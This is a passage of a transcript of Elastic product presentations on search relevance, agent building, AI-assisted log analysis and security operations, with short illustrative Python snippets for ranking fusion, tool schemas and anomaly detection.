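    return sorted(scores, key=scores.get, reverse=True)

lexical = ["a", "b", "c"]   # BM25 order
vector  = ["c", "a", "b"]   # embedding-similarity order
print(rrf([lexical, vector]))  # -> ['a', 'c', 'b']
```

Fusion like this is only one of the tuning levers mentioned above; a re-rank model would typically be applied after this step.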

You're going to need to monitor that application. You're going to need to have query logging and metrics and tracing for that application. You're going to need to make sure that you're doing cost and token tracking. It doesn't stop there, though. We're in the age of agentic AI. The patterns change a little bit. Previously, you just focused on passing the right data to an LLM in its context window. In an agentic architecture, you're doing things differently. Now what you're doing is you're exposing that data as an MCP tool to an agent or to an LLM. You're helping with tool selection. Now you need a whole new set of things. You need to have prompt management. You need to have memory management. You need to have a set of capabilities for building MCP tools. You need to have capabilities for helping the LLM do a tool selection.
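
For a concrete sense of what "exposing data as an MCP tool" means, here is a minimal sketch of a tool descriptor in the shape MCP uses: a name, a description the LLM reads when doing tool selection, and a JSON Schema for the inputs. The tool itself is hypothetical.

```python
# A minimal MCP-style tool descriptor. The LLM never sees your index
# directly -- it sees this description and schema, and decides when to
# call the tool. (Hypothetical tool; the fields follow the MCP shape of
# name / description / inputSchema.)
search_tool = {
    "name": "search_customer_docs",
    "description": (
        "Semantic search over customer support documents. "
        "Use when the user asks about a customer's history or issues."
    ),
    "inputSchema": {
        "type": "object",
        "properties": {
            "query": {"type": "string", "description": "Natural-language query"},
            "top_k": {"type": "integer", "default": 5},
        },
        "required": ["query"],
    },
}

def validate_call(tool, arguments):
    """Tiny stand-in for schema validation before executing the tool."""
    required = tool["inputSchema"].get("required", [])
    return all(field in arguments for field in required)

print(validate_call(search_tool, {"query": "billing disputes"}))  # -> True
print(validate_call(search_tool, {"top_k": 3}))                   # -> False
```

The quality of the description matters a great deal here: it is what the model uses to decide which tool to pick, which is the "tool selection" problem mentioned above.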

There are a lot more things that you need to do. All of this is context engineering. This is a term that you're going to hear a lot over the next couple of years. Context engineering is vital to doing agentic AI right. It's not a term that we invented. It is something that's used popularly in the industry. We did pioneer a lot of the capabilities in this space. We did trailblaze a lot of the technologies here because, you see, we do all of this. Steve is going to show you many of the capabilities, especially the agentic AI capabilities that we've been working on. I just want to make sure that it's clear. We didn't pivot recently to doing this. As Ash pointed out, we've been doing this all along because context engineering is all about relevance. We are the leaders in relevance.

It is in our DNA. I believe that we were made for this moment. Finally, we win because we win with developers. We have, over the last 15 years, built a community of millions of developers that know and use Elasticsearch. According to the annual Stack Overflow survey, 17% of all professional developers in the past year have used or built on Elasticsearch. 19% of all AI developers worldwide use Elasticsearch. A lot of this is because of our reputation in open source. As Ash pointed out, we've been downloaded 5.5 billion times, which makes us one of the most popular open source projects of all time. The other thing developers love about us is that we continue to expand our platform, offering additional capabilities all the time. They make it possible for our customers, our developers, to build amazing things on top of our platform.

Over the years, I've been amazed at what people have built: ride-sharing applications built on Elasticsearch, matchmaking sites built on Elasticsearch, fraud detection systems, signal intelligence systems, all these things built on Elasticsearch. Three of the most popular use cases have been in search AI, Observability, and Security. To make it possible for our customers to get up and running using us in these three scenarios, we created out-of-the-box solutions that make it possible for them to get started immediately using us as an Observability platform, as a Security platform, and for search AI. With that, I want to turn the stage over to Steve and Santosh, who are going to walk us through these three solutions and these three businesses, beginning with Steve Kearns.

Steve Kearns
Group VP and General Manager of Search, Elastic

Thank you. Nice work. Great job.

All right. Hi, everyone. I'm Steve Kearns. I'm the GM of the search business here at Elastic. I've been with the company for 11 years. I've lived through this time where Ash and Ken are saying we've always been a search company. Relevance has always been at our heart. I can tell you it's true. It's really been fun to see the excitement, the interest around generative AI, and how central relevance is to success in those applications and in those use cases. When you think about the kinds of use cases that people run on top of Elasticsearch, you can think about search-powered applications. For the entire history of the company, we've been a great data store, a great platform for engineers to build compelling, engaging experiences for their customers.

In fact, I bet a number of you here today, I don't know, looked up a coffee shop, might have placed an order. You might have then filed an expense report. All of those kinds of applications, those things are built on top of Elasticsearch. I bet many of you experienced Elasticsearch in one way or another today as part of these experiences. People build on us because of the performance. They build on us because of the relevance. Just as importantly, because of the flexibility that we provide as a platform. When you bring data into Elasticsearch, all of the fields in that data are instantly queryable, by default, out of the box. That's a great experience for a developer. It's why so many applications continue to be built on top of Elasticsearch. As we see the excitement around AI, we're seeing these new workloads.

AI is driving the development of new experiences, often in response to new expectations from customers or from employees that are using AI tools at home, using AI tools in their personal life. They want that same experience in the business. When you think about these conversational experiences, and Ken talked about this really well, the conversational and agentic experiences, they depend so much more on getting the right business data, the right context, in order to give you the right answers. If you think about what it takes in AI to get that right answer: language models are great. They have wonderful world knowledge. But they don't know about your business. They don't know about your job. They don't know what problem you are trying to solve.

The job then that we have to do on the data store side is to get the right context, the right information from your business to the model to help you with your task at hand. This is really important with conversational AI, just asking a question. If it doesn't give you the right answer, users are going to lose trust in that system very quickly. It's even more important, as Ken said, when these systems start to take action on your behalf, the agentic workflows, and they're taking action, they're changing things in your business, it has to do the right thing. It has to have that right information to make those decisions and make those choices. We really believe very strongly that relevance is at the heart of every successful AI implementation, every successful AI project.

It's no surprise then that the core of why we win is all around relevance. Ken talked about all the features, all the capabilities that we've added into the platform. When you think about relevance, it's not about one feature. It's not like, yes, we added one new feature, done, relevance is solved. Relevance is really personal. It's about what data you have available, what information need the user has, what they are trying to do, and whether we have the information available to help them with that. Relevance is about flexibility, the flexibility that we have as a platform to retrieve the right data, to give you the tools, because sometimes you're looking for one right answer: what's the document that contains the answer to the question that I have? Sometimes I need to see a chart.

Sometimes I need to look at an outlier. Sometimes I need to find just one piece of information, but see how it compares to the rest of the population. What's one customer? How do they compare to the rest of my customers? This is a really important element around why we win, this flexibility that we have to get the right relevance. Another thing, Ken talked about a lot of the work that we've done around speed, scale, and relevance. This is really driving a lot of the places that we win. If you think about speed, e-commerce companies, a lot of the major e-commerce companies that we know and love are building their e-commerce search on top of Elasticsearch because they recognize that better search quality delivered faster leads to more business for them, right? You don't want to wait for your search to complete.

You don't want to get the wrong results. It makes a huge difference in the e-commerce space. We also see this on the scale side. We've got one customer, a document management customer in Elastic Cloud today, storing over 5 billion vectors in a single use case in Elastic Cloud. They're only able to do this because of the efficiency work that we've done. Ken talked about BBQ. There's a new thing actually being talked about, I think right now, in the other room, called Disk BBQ, another order of magnitude of efficiency in memory. This allows these multi-billion document use cases to be built at all, and to be built on top of Elasticsearch. We really do focus on developers, right? Developers are the ones very often making the technology choices.

The better experience we can provide them, the more batteries included, the more we can provide out of the box to make this easy to get started, the better developers are going to find success building on top of us. One of the key things, and Ash touched on this at the beginning, one of the key aspects of relevance is actually having the right models, the right language models to generate embeddings to power vector search. These language models are really important. I couldn't be more excited to have the Jina AI team joining Elastic. They're well known in the industry as a leading-tier research organization, putting out incredibly accurate, low-resource-usage, very efficient, very fast models. One of the things that I love about the team, the models are great. I'll talk about those in a minute.

I love the way that the team works. With every model that they release, they publish a research paper along with it. This has done a tremendous amount to help build the credibility in the market. The trust and the reputation that they have comes from the way that they work in the open. They make their models available on Hugging Face under an open-weights, but not open source, license, so people can download them and advance the state of the art in research. When they want to use them commercially, they need a license. This is a wonderful model, very well aligned with how we operate our business as well. The models themselves are really exceptional. They've got a multilingual model that allows you to do same-language and cross-language searching in over 100 languages.

They've got a multimodal model that allows you to do searching in the images, searching in the embedded text and charts and graphs inside of other documents. This multimodal search is really important. That efficiency part is also important. They just released a new V3 of the re-ranking model last week that has a novel approach to the way that they do re-ranking. What it really allows them to do is provide a highly efficient model. It runs fast. It runs efficiently. It does that while giving leading-class accuracy. Really impressive work that the team has done. Couldn't be happier to partner with them going forward. It's not just about Jina AI. Every major player in the AI ecosystem has an integration with Elasticsearch. It's because they all recognize how important relevance is to getting successful AI implemented in businesses. All of these partners, we partner with them very closely.

We talked about some of the work that we're doing with NVIDIA on GPU acceleration. We're also inside their AI factory along with Dell. We've got integrations to every one of the agent-building frameworks like LangChain and LlamaIndex, who are here today, and so forth. This idea of being able to be the most flexible platform to integrate anywhere is central to our strategy. There's not going to be one model that's better than all of the others for every use case. There's not going to be one agentic AI framework that wins. We want to make sure that no matter where you're starting, no matter what you're using, you can use Elasticsearch to provide the relevant context to that application. This really leads into not just the models, not just the integrations, but the platform and the product itself. When you think about Elastic, it's a search engine.

It's a vector database. It's a NoSQL store. It's a column store. It's a geospatial store. We have all of these capabilities, and we wrap it up in a single API. That's a lot for a developer to learn to be able to just get started and start building applications. We're continually working to simplify that process. When you bring data into Elastic, we use our first-party ELSER model by default out of the box to generate embeddings for you, so you can get hybrid search without having to learn what a vector even is. You don't have to start by doing that. If you have a model that you prefer, if you fine-tuned a model specific for your environment, great. You can plug it right in, and there's a place for that.

I mean, this progressive disclosure of complexity, we really think about this a lot and how we can simplify the experiences for our users. Nowhere is this more true than in the agent-building space. If you think about all the steps that it takes to build an agent, I pick a framework, get a language model, connect those things together, set up memory, figure out how to write queries against the engine, it's a lot of steps that people can take. If you already have a framework, we partner with them. It's great. You have the best possible experience there. If you're just starting with your data, you're saying, what can I do with this? We want to do a lot to make that easier. That's why we introduced earlier today our Agent Builder feature.

This is really designed to take any data that you have inside of Elasticsearch and instantly make it available for agents in chat and to build and extend from. Rather than try to describe it, why don't I just show it? If we can switch the laptop over, please, to the demo. Let's take a look. All right. Fantastic. You've seen that? Good. What we have here, this is a live running cluster on Elastic Cloud Serverless. What I did is I loaded up just a simple set of data. This is a financial services data set here. It's got some account data, some sort of semi-structured data around accounts, assets, and holdings, and then a lot of unstructured data, which is very representative of what we've seen in a number of our customers.

News data, you know, financial analyst reports, and then interactions between our financial advisors and the customers. I've done nothing other than that. I've just loaded the data. When I come up to the system, right out of the box, I've got a new tab. I've got a new experience in the UI that says Agents, and I can start asking questions. Now I can start asking questions of the system. What's going to happen here is, as I ask the question, the built-in agent that we provide as part of Agent Builder is going to look at the data that it has in the system.

It's going to use a set of native tools: it understands my question, picks an index that it's going to search, crafts the query, runs it, and passes that result back to the language model, and we're going to see the answers coming back in terms of what it actually believes from the reports. Right now, what I just did would normally take a developer hours, days, maybe even weeks, if you're just learning this technology, to go and assemble all of the moving parts to answer this kind of a question. You can keep going with these kinds of conversations. You can say sort of like, who are my customers? You can start to now just continue to ask these kinds of conversational questions with the data right out of the box.

Again, I've done nothing to customize the system. I just loaded the data and started a conversation. This is how it should be. This is a POC. The time it takes to understand what kind of applications I can go and build on top of this went from days and weeks to seconds. You can start that conversation. If I wanted to go further and say, hey, this is great. This looks like this is going to work for me. Now I want to customize this. I want to put this application in front of my actual financial advisors. I want to customize the system to make sure the most common tasks, the most common workflows are great. For that, we give you an ability to customize the tools.

When I said before we want it simple out of the box, but still to have the full power of Elasticsearch at your fingertips, this is where custom tools come in. I can come in and I can define a custom tool. In this case, I know my financial advisors are going to be doing summaries of portfolios on a regular basis. I can add this custom tool, and I can do that with the full power of the Elasticsearch query language. Here, I'm doing joins across the structured portions of the data. I'm doing hybrid search using a semantic search and a lexical search against the content and the news that might be related to this portfolio. This ability to use the full power of Elasticsearch to customize it and provide that as a tool back to the language model is really powerful.

This is the first way that you can customize the agents that you build with Elastic. The second thing that you might want to do is actually change the way that the agent engages. Out of the box, the default agent we provide just generally tries to be helpful and answer the questions with whatever data it has. If I'm going to put this in front of a specific type of user, I want to customize it. I want to give it more specific instructions. How do I help the users more? How do I make sure that this knows exactly what tools to take advantage of? Here you can see this custom agent that we created has a very specific prompt to help out human advisors, financial advisors. We've got that set of tools, including the custom one we just looked at.

With nothing more than just a customized set of instructions and a custom prompt based on Elasticsearch query language, I can now start chatting with this specialized agent and start to ask a new set of questions. I can ask a question like this: Who are the top customers? Again, just like we saw before, this agent is going to look at the tools that it has available, figure out what's the best strategy for getting the answer out of Elasticsearch. It's going to then figure out, OK, in this case, I need to write an ES|QL query. Great. Let me write that query to figure out who our top customers are, go out, run that query, bring the results back. It's really nice because this is, again, a capability that's provided right out of the box. What you can see here is it's able to bring this data back.

It sees that it's tabular data. It sees that this is the kind of data that probably belongs in a chart, and automatically starts charting it for me. Over time, I can customize. I'll be able to add this right to a dashboard straight from here to start building a regular view on top of the data. If I come in and I wanted to just kind of look even more closely at some of the particular accounts, right? Let's say I'm getting ready to meet with a customer. I can ask for a specific summary of that portfolio. Now I can ask a more sophisticated question: look at their portfolio, summarize it for me, then look at the investments in that portfolio and what's related in the news that might be interesting, that they're going to ask about when I have a meeting with them later.

This idea here is going to trigger the model to, again, go and look and say, what tools do I have available to answer this question? That custom tool that we took a look at before, the portfolio summary tool, is exactly what's needed for this sort of a query. I can go from having that top-level query that says, who are my top customers, to a quick summary of their portfolio, and then an understanding of how AI-related news might be affecting them. This idea of combining your structured view with your unstructured view is incredibly powerful. This is, again, the second major feature here. I just created a custom agent in like five minutes on stage live. This is incredibly powerful for accelerating the process of building these applications. It's not just about answering questions. This is really nice. It's also about taking actions. I can do this.

I can actually say, email this to one of my colleagues. What's going to happen here is it's going to say, OK, great. Looks like you want to take an action. This is what Ash referred to as the workflows feature. We've added a new set of capabilities for taking multi-step, complex actions into the system. This ability to define these workflows is actually a set of technologies and capabilities we acquired from Keep, I think two or three quarters ago, and really quickly integrated. We can see the send message here very quickly looking it up. What that's doing is it's actually going to our workflow system. It's using this system to look up who is the contact that we want to send it to.

Let's look them up in the database, retrieve their email, their contact preferences, and send the right kind of message to that user. You can imagine how these workflows can get a lot more interesting over time. This is just a taste. This is how we make actions available to these agents. The last thing that I'll touch on before I get to the end of the demo is everything that we saw today, everything that we looked at, everything from these charts to the interactions, the whole thing, this is all a set of APIs in Elasticsearch. It's wonderful we provide this chat experience. If you want to bring your customers, your employees directly into Kibana to access it, that's great. If you already have an application where you might already be sending your users, you can extend that. These are just APIs.

The tools are available over MCP, a very common way to connect agents to data. The agent itself is available over A2A, so you can embed it directly into an agentic UI. This is just a sample of what you could build on top of Elasticsearch with those chat experiences as a native part of it. You can see here, we're able to just bring up the single account that we had just looked at with Elasticsearch queries directly. We can pull out the chat experience, and we can actually have that same kind of a conversation with the same agent that we just created right here in this custom application.

This idea of being able to easily walk up to your data in Elastic and start a conversation with an agent, extend that agent specifically for the workflows and the tasks that you have, connect that into your business and take action, and then build that into the experiences where your users are, is a dramatic simplification to what it takes to build these kinds of agentic applications. With that, can we switch back over to the slides, please? Just close out with one more here. The thing that I wanted to just end on is the opportunity that we see in the AI space is huge. I think it's a very simple story, right? We see, and I hope it's clear at this point, that relevance is more important than ever before in the agentic world, in the AI-powered world. Elasticsearch is the best platform for relevance.

That means that our opportunity is massive when it comes to this emerging market opportunity for AI and context engineering. With that, let me hand it over to Santosh to talk about our Security and Observability businesses.

Santosh Krishnan
Group VP and General Manager of Security and Observability, Elastic

Thanks, Steve. That's amazing. I'm Santosh Krishnan. I'm the GM for our Security and Observability businesses. I'm really excited to share with you some of our AI innovations, as well as the platform advantages that we are bringing to the Security and Observability spaces. Starting with Observability, as Ash mentioned, in Observability, customers typically start their journey with us with log analytics. They use our platform to efficiently store all their logs and then use the platform capabilities in search, machine learning, and AI in order to triage and investigate issues. That's the primary purpose where we land most of our customers in Observability. Over time, many of these customers have organically grown, even in many cases without our product. They've organically grown to add additional signals like metrics and traces and so on to bring together and use our entire end-to-end Observability suite.

One of the main reasons they do that is that they can now correlate all of these signals using a single platform, a single query language, a single set of workflows. This is the main reason why they actually come to us for end-to-end Observability, all the while taking advantage of all the data store optimizations that Ken spoke about, the LogsDB, the TSDB, all the specific optimizations that we have made for those signals. Customers benefit from that as well. The Observability space itself is changing. We have already seen a couple of generations. We have gone from legacy Observability tools, which are really just alerting engines. They are health monitoring tools. They tell you what happened. They do not really tell you what to do about the thing that just happened. Those used to be the first generation of Observability tools.

I would say we are currently in the second generation, where there is an added focus on triage and investigations. Unfortunately, though, that added focus has come with very complex instrumentations that you have to build into your data sources so that you may investigate your issues later. Dealing with messy, unstructured data, which is prevalent in Observability, it's actually a fool's errand to try to lend structure to it or try to solve it using instrumentation and such. AI to the rescue, because things are changing again. Observability is changing again, because harnessing the power of AI and all of that information, that dense information that resides in your logs in order to triage and rapidly resolve your issues is now going to be the focus of the next generation of Observability.

Make no mistake, logs with AI will be the foundation of how you do investigations in this next generation. Together, as we have spoken about, OpenTelemetry is the other trend that is also happening at the same time. This is really the industry's way of trying to get away from all this complex instrumentation to understand the semantics of data and so on and so forth. We recognize that. We adopted it. We contributed to it. When you combine AI and OpenTelemetry, you essentially get to this next generation of Observability. Of course, it's our goal to leverage our natural advantages in dealing with unstructured data and using the native AI capabilities to help our customers go through this journey.

To summarize why we win, customers continue to choose us for our platform advantages in speed, fast investigations, efficiency in storing all of those signals in Observability, and those specific data store optimizations which I mentioned. More recently, customers have started selecting us for our native AI and relevance capabilities in order to investigate faster. I'll speak a little bit more towards that in a minute. We bring all of these innovations in an open and extensible fashion. We have always been open source. Now, with OpenTelemetry, we have gone all in. Over here, of course, we want to take this burden of instrumentation away from SRE teams. Logs are back. Now I'm talking about the modern generation of Observability. If you actually look at all the signals that you use in Observability, logs are the most information-dense signals which you have at your disposal.

Your metrics and infrastructure monitoring can tell you what happened, what went wrong. Your traces and your application monitoring tools can tell you where something went wrong. You can trace, as the name suggests. In order to do deeper investigations, you always have to go back to the information which is in logs in order to understand why something happened. Logs have always been the repository of knowledge which answers the why question. Now, with AI, you can actually harness all of that dense information that's already sitting in your data store in order to get to rapid issue resolution. By the way, today in Elastic, we already offer our customers a combination of search capabilities using ES|QL that Ken talked about, and machine learning capabilities for anomaly detection and such. We recently introduced this capability called Streams to just make logs magical.
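
As a toy illustration of the anomaly detection side of that combination (not Elastic's actual ML implementation), flagging a spike in per-minute error-log counts against a simple baseline might look like:

```python
from statistics import mean, stdev

# Illustrative sketch only: flag time buckets whose error-log count
# deviates sharply from the overall baseline. This is the simplest form
# of the anomaly detection that points an investigator at the logs
# answering the "why" question.

def anomalous_buckets(counts, threshold=2.5):
    """Return indices of buckets more than `threshold` std devs above the mean."""
    mu, sigma = mean(counts), stdev(counts)
    if sigma == 0:
        return []
    return [i for i, c in enumerate(counts) if (c - mu) / sigma > threshold]

# Error counts per minute: steady baseline, then a spike worth investigating.
per_minute = [4, 5, 3, 6, 4, 5, 4, 52, 5, 4]
spikes = anomalous_buckets(per_minute)
```

A real deployment would of course model seasonality and multiple series, but the shape of the workflow is the same: surface the bucket, then drill into the raw log lines behind it.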

To give you an idea, even setting Elastic aside, in any Observability tool today, if you want to get all the value out of logs, you need to understand where the logs are coming from. What are the sources of these logs? A human has to understand that, build integrations and such. You have to understand what is contained in those logs so that you know later what to look for. This is especially true because logs are messy and do not come with a priori structure and semantics. Last but not least: OK, I've figured all of that out; I now also have to figure out what questions to ask. When there is an issue, I have to go back to the system and figure out what queries to run, what questions to ask.

These have been burdens on the SRE teams until today. We are taking all of those burdens away in understanding where your data is coming from, gleaning what it contains, as well as suggesting what one ought to be looking for when the time comes for investigation. With that, I actually want to show you. I'm going to invite David Hope, who is a leader in our product team, to show you what we just introduced.

David Hope
Director of AI-powered Observability Solutions, Elastic

Thank you very much, Santosh. Right. Just get rid of Steve. As Santosh was saying there, logs are back. Of course, you may not have seen them, but trust me, they're everywhere. You click a button on your remote control, you make a trade, large volumes of log lines are generated. They're used by practitioners to understand your experience or how quickly your trades are going through. Today, logs are incredibly difficult to work with in any Observability solution. The Observability industry has left a lot of value on the table when it comes to logs. Engineers today have to code integrations. They have to create complex pipeline processing code, and they have to know exactly where and what to look for when they're doing investigations. Off-the-shelf integrations, like the ones you see on the screen here, help a little bit.

Quite often, you can't find the integration you need. Application developers writing custom application code don't usually use a standard pattern or format, making it incredibly difficult and time-consuming to process logs. With Elastic Streams, we're changing things. No need to install any integrations anymore. No need to fully understand all your log sources. All you do is point your logs at Elastic, and we take care of it. No more complex pipeline processing code to manage. No more trying to figure out what systems your logs belong to. No more hunting high and low for integrations. The magic here is that LLMs are amazing at understanding unstructured data. Combined with Elastic's expertise in logs and context engineering, that means Elastic Streams can automatically organize your logs, find meaning in your logs, and find problems in your logs.

In this new world where logs flow smoothly to Elastic without any pre-ingest pipeline processing overhead, the first thing that practitioners want to do is organize their logs. What we do is, like any good filing system, we look at the data to understand exactly how to organize our logs. We do this with AI. I click here, suggest partitions with AI, and the AI goes off. It's found two systems, a Hadoop system and a Spark system. Perfect. I now have my logs nicely organized, and I can find what I need very, very quickly. The next thing that practitioners want to do, now that we've had our logs organized nicely, is find the meaning in their logs. You heard today a lot about unstructured data. The majority of our customers send logs to Elastic in unstructured formats. Doing analytics on unstructured data can be pretty tricky, right?
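
The "suggest partitions with AI" step can be sketched with a keyword heuristic standing in for the LLM; the markers below are assumptions for illustration, not Elastic's classifier:

```python
# Toy stand-in for the AI partitioning step in the demo: an LLM infers
# which system each log line came from; here a keyword heuristic plays
# that role so the surrounding plumbing is visible.

MARKERS = {
    "hadoop": ("namenode", "datanode", "hdfs"),
    "spark": ("executor", "sparkcontext", "dagscheduler"),
}

def suggest_partition(line: str) -> str:
    """Assign a log line to a system partition, or leave it unpartitioned."""
    lowered = line.lower()
    for system, words in MARKERS.items():
        if any(w in lowered for w in words):
            return system
    return "unpartitioned"

logs = [
    "INFO DAGScheduler: Submitting 4 missing tasks",
    "WARN hdfs.DataNode: Slow BlockReceiver write",
]
partitions = [suggest_partition(l) for l in logs]
```

The value of the real feature is precisely that nobody has to hand-maintain a marker table like this; the model proposes the partitions from the data itself.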

If you took like a written piece of text and you tried to put it in your Excel function, you probably wouldn't get a great result, right? Elastic is making things different here, right? We're an expert in dealing with unstructured data. What we can do with Elastic Streams is we can find the patterns and the meaning in the logs and the context. Let's just take a look at what that looks like here. I can create a processor, and I can use AI to look at the logs. You can see straight away that it's found the patterns in our log files. It's not just found the patterns, but there's some contextual data in here. All we gave it was the log file, and it has inferred that there are stock symbols, quantities, and prices in here.
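
To illustrate the kind of structure being inferred, here is a hand-written stand-in for the pattern the AI proposes; the log format and field names are invented for this sketch:

```python
import re

# Sketch of the structure Streams infers from unstructured trading logs.
# In the product an LLM proposes the pattern; here a hand-written regex
# with named groups stands in for it.

PATTERN = re.compile(
    r"order (?P<side>BUY|SELL) (?P<quantity>\d+) (?P<symbol>[A-Z]+) @ (?P<price>\d+\.\d+)"
)

def extract_fields(line):
    """Pull structured fields out of a free-text log line, or None if no match."""
    m = PATTERN.search(line)
    return m.groupdict() if m else None

row = extract_fields("2026-04-27T14:03:11Z order BUY 100 ESTC @ 47.83 filled")
```

Once fields like symbol, quantity, and price are extracted this way, the "most popular stock over a time frame" analytics in the demo become an ordinary aggregation.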

Obviously, we're using trading data because we want to bring this into your language a little bit. Now, once I apply what it's found, you can see straight away that I can now do really nice analytics on this data, like trying to find what the most popular stock is over a particular time frame, for example. I can quickly save that and move on to one of the most important things that practitioners want to do. We've organized our logs, we found meaning in our logs, but now we want to find problems in our logs. We need to make this easy. I don't want to drown in logs or dig around trying to find queries that I need to find problems. I use significant events, and significant events can quickly find problems in our logs for the specific systems that we're working with.

Here, you can see that it's detected that this is a Spark system, and these are specific problems that relate to Spark systems. I can bring these into Elastic, and all of a sudden, we can monitor our Spark systems for things like out-of-memory errors or whether task execution is performing correctly. When I do that, our machine learning-powered change point detection can immediately discover whether or not any of these problems have occurred. I'll give you an example here, this out-of-memory error. If we dig into this, we can see the query that was generated by AI, and we can see all of the logs that relate to that out-of-memory error. I can quickly dig into one of these, which makes lives a lot easier for practitioners, as you can imagine. It automates the investigative process and root cause analysis.
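
A minimal sketch of the change point idea (far simpler than a production ML implementation): pick the split of a count series that maximizes the jump between segment means:

```python
# Minimal change point sketch, not Elastic's ML implementation: find the
# index where the mean shift between the left and right segments of a
# count series is largest. This is the basic idea behind flagging when
# out-of-memory errors start occurring.

def change_point(series):
    """Return the split index with the largest jump between segment means."""
    best_i, best_gap = None, 0.0
    for i in range(1, len(series)):
        left = sum(series[:i]) / i
        right = sum(series[i:]) / (len(series) - i)
        gap = abs(right - left)
        if gap > best_gap:
            best_i, best_gap = i, gap
    return best_i

# OOM errors per interval: quiet, then a sustained jump starting at index 4.
oom_counts = [0, 1, 0, 0, 9, 11, 10, 12]
shift_at = change_point(oom_counts)
```

The detected index is the moment an investigator wants to jump to in the raw logs.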

Here, if I use our AI Assistant to ask what this message is about, I can immediately see the root cause of the problem with the Spark system. It's given me all the information that I need to see what the problem is. It's recommending how to fix that problem too. In summary, organizing logs, finding meaning in logs, and finding problems in logs has been a problem that has plagued the Observability industry. Elastic, with its expertise in applying AI to unstructured data, is bringing clarity to this chaos. We're bringing agentic AI and LLM technology to logs, to organize logs, to find meaning in logs, and to find problems in logs in minutes, not hours, so that your trades can go through successfully. Thanks, Santosh.

Santosh Krishnan
Group VP and General Manager of Security and Observability, Elastic

Thanks, David. Yeah, it's a good one. Thank you. To summarize Observability: in this future, where we bring to bear the power of logs, our ability to deal with unstructured data in general, and AI applied to automating root cause analysis, our objective is, of course, to grow our market share in logs as logs themselves become more important in the age of AI. We are growing beyond logs as well. That's our additional opportunity on top of what I said. If logs are the center of investigations, our objective is to expand from that center by adding those additional signals towards the multi-signal, end-to-end Observability offering. Those are the two main opportunities in front of us in Observability. Switching to Security, you will see a lot of similarities there.

In Security, customers typically start their journey with us with SIEM and security analytics use cases. This is largely to displace or replace their existing SIEM, or in many cases, to augment them. We have both displacement and augmentation customers today. The goal here is the same as the one I showed in Observability, which is, in this case, to modernize your security operations center using the combination of the search, machine learning, anomaly detection, and AI capabilities that we offer. Over time, and on the back of a lot of investments that we have made in endpoint and cloud protection, many of our customers are now organically growing into those areas as well. From the same platform, with a single click, you go into our console and add endpoint. Now, suddenly, we are actually your XDR solution as well.

It is not just ease of use and tool consolidation that lead people to grow into these other use cases with us. We actually offer a truly unified platform approach to bring together all signals, whether they are coming from endpoints, identity systems, or firewalls. You can use all of these signals together for your detection and investigation needs. We are fast gaining momentum in endpoint security. We have been making investments both in our threat research and in our agent capabilities for on-device blocking, remediation, forensics, all of those features that you expect in EDR tools. On the back of all of that investment, we are now being recognized as one of the top-tier endpoint protection systems out there by third-party benchmarks like AV-Comparatives and such. When you look at how the Security space, SIEM, security analytics, that entire space is evolving, that is changing as well.

One might even say it is changing even faster than the Observability space. Here, we actually went from legacy SIEM systems, which were all about compliance and visibility, a single pane of glass to see all your alerts in one place, and so on and so forth. Then came the next generation of SIEM, SIEM 2.0, next-gen SIEM, whichever name you want to use, the current generation, where the industry actually expanded beyond that into finding issues. Detecting issues with rules and machine learning, workflows for investigation, response, and remediation, all of this got added in the second generation of SIEM. We have been beneficiaries of that. When I said that customers have been adopting us to displace their legacy SIEM, we have grown on the back of that transformation. That is changing again as well.

With AI, and this is not just a matter of adding an AI assistant or copilot or something to your existing SIEM, with AI, every key workflow that InfoSec analysts use is getting automated by AI. By every key workflow, what I mean is all the way from ingesting data, writing your detection rules and dashboards and other content, triaging alerts and investigating attacks, finding the risk posture of your IT infrastructure, running workflows to take remediation steps. These are, I would say, the main things that you do with a SIEM. All of them are getting transformed with AI. Make no mistake, while we were beneficiaries of the previous generation, we are actually leading the charge over here. There is no customer conversation in Security that I now have, which is not about modernizing their SOC with the AI capabilities which we offer.

We have been first to market in it. I'll show you a few of those in a minute. Why does Elastic win in Security? Customers still choose us for the benefits of the Elasticsearch platform in terms of its speed. We are the fastest security tool out there for doing things like threat hunting and such, and for efficiently storing all your security data so that you don't have to pre-filter things away using ingest pipelines and such, because the moment you pre-filter, you will lose some threads in the data which you drop. We offer those benefits. As I said, we are redefining the SIEM as we speak. We are actually leading the charge over there. We have already been winning because of that over the last year and a half or so. Last but not least, we actually provide a true platform for unifying all your signals.

This is why we are actually starting to win in XDR. That's because it's really our architecture. We are not taking a SIEM in one place and EDR in another place, drawing a circle around it and calling it a platform. It's actually a true platform that brings all the signals together for your consolidated detection, investigation, and response needs. Let me speak a little bit more about what we have done when I say that we are embedding AI everywhere. Over the last year and a half or so, and I'm not even going to talk about our AI Assistant, which, by the way, was the first one in the industry in the Security space, we have actually embedded AI workflows throughout our product. We introduced a capability called Automatic Import. This is to onboard your data.

By the way, things like data import used to take months and months in that initial part of the implementation. Now it takes weeks at worst. We introduced a capability called Automatic Migration so that you can bring all your rules and dashboards from your existing tools. They get migrated automatically into Elastic. A little more than a year ago, at RSA last year, we actually introduced this capability called Attack Discovery. What that does is, instead of your InfoSec analysts getting inundated by all the alerts that your detection rules and machine learning jobs found, it coalesces all of those alerts into a few attacks that matter. Now the InfoSec analysts, instead of looking at each alert to triage, can actually go into those attacks, investigate them, and spend their time in a prioritized fashion.
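
The coalescing idea can be sketched naively; in the product an LLM reasons over alert context, while here alerts sharing a host are simply grouped into one candidate attack, with invented alert shapes:

```python
from collections import defaultdict

# Toy sketch of the coalescing idea behind Attack Discovery: group raw
# alerts into candidate attacks keyed by the host they touch. The real
# feature uses an LLM over much richer context; the alert shapes here
# are invented for illustration.

def coalesce_alerts(alerts):
    """Group raw alerts into candidate attacks keyed by host."""
    attacks = defaultdict(list)
    for alert in alerts:
        attacks[alert["host"]].append(alert["rule"])
    return dict(attacks)

alerts = [
    {"host": "web-01", "rule": "suspicious powershell"},
    {"host": "web-01", "rule": "ransomware note written"},
    {"host": "db-02", "rule": "failed logins spike"},
]
attacks = coalesce_alerts(alerts)
```

Even this crude grouping shows the shape of the payoff: the analyst triages a handful of attacks instead of a wall of individual alerts.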

This has been one of the most well-received capabilities in our Security offering over the last year. We have made a lot of those innovations in AI. We are even allowing our customers to use our AI capabilities on top of their SIEM tools and XDR tools because we want to meet them where they are on their journey, so that they can adopt AI capabilities as an entry point and then, over time, migrate the rest of the SIEM onto Elastic as well. This is something that we introduced this year: the Elastic AI SOC Engine, which goes by the colloquial term EASE. Now you can easily adopt Elastic with AI. Coming soon, we are going to be introducing the Elastic workflow engine that Ash Kulkarni talked about, on the back of the acquisition of Keep, as well as AI-based entity analytics.

Instead of talking about all of those, I'm going to invite James Spiteri, who is a leader in our product team in Security, to actually show you some of that.

